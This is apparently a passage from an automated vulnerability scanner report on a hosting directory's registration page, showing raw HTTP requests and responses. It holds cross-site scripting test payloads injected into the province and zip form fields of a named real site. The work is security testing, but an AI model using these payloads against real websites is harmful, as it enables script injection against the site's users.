POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 544 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D99)%3c%2fscript%3e&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='76E0188F5F077DBDC828DAFC30B9214CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBD893D2602043E77EB6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBD2301E7356D98DFD8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD6C1C6ABAD5F051C8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBD4186DDFB1423362B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='76E0188F5F077DBDAEB4F07CDF9BD024C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBDF1BE2961E591B425C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBDF1FFD5FADC13FC7B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBDA61EFF2581A704C4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBD4A03FE441BE2E9776F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='76E0188F5F077DBD20425A84DF8EA690C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBD62F927366357C81CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBD34C137D681231501C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD980720B433639A27C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBD8C9E097E038D4C78C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='76E0188F5F077DBD2C8086229F9FE9AAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBDD290CDE2E40401916F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBD41AF04B5A13F24666F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBDADFB2896191064DD6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
'"--></style></script><script>alert(0x001D9A)</script>
country
POST
225
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 544 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D9A)%3c%2fscript%3e&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='76E0188F5F077DBDA971334CDE9E3F2CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBD64DFABC32DE5FA9A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBDB9A639E753F1C6D4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD76160ADDCBFD024CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBDA040BB48F2BA4B706F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='76E0188F5F077DBDE9C44FBF5A3783C7C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBDA28BA7236305A230C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBDA1C304AB22C5F7CF6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBDAA54B2A79DFC3F83C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBDFE07177A8248E07A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='76E0188F5F077DBD12A7E2E6BD950AE0C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBDD25B27FEA0A3E7A6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBD5A62BD5735D1740FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBDE1F8C1FA57583949C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBD504D178C2727600AC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='76E0188F5F077DBD2D79E432F23AA6D9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBDD31290EA3E1B3AF06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBDA3CEEA8CBEAD111B6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBDE436BD464E90E73E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" 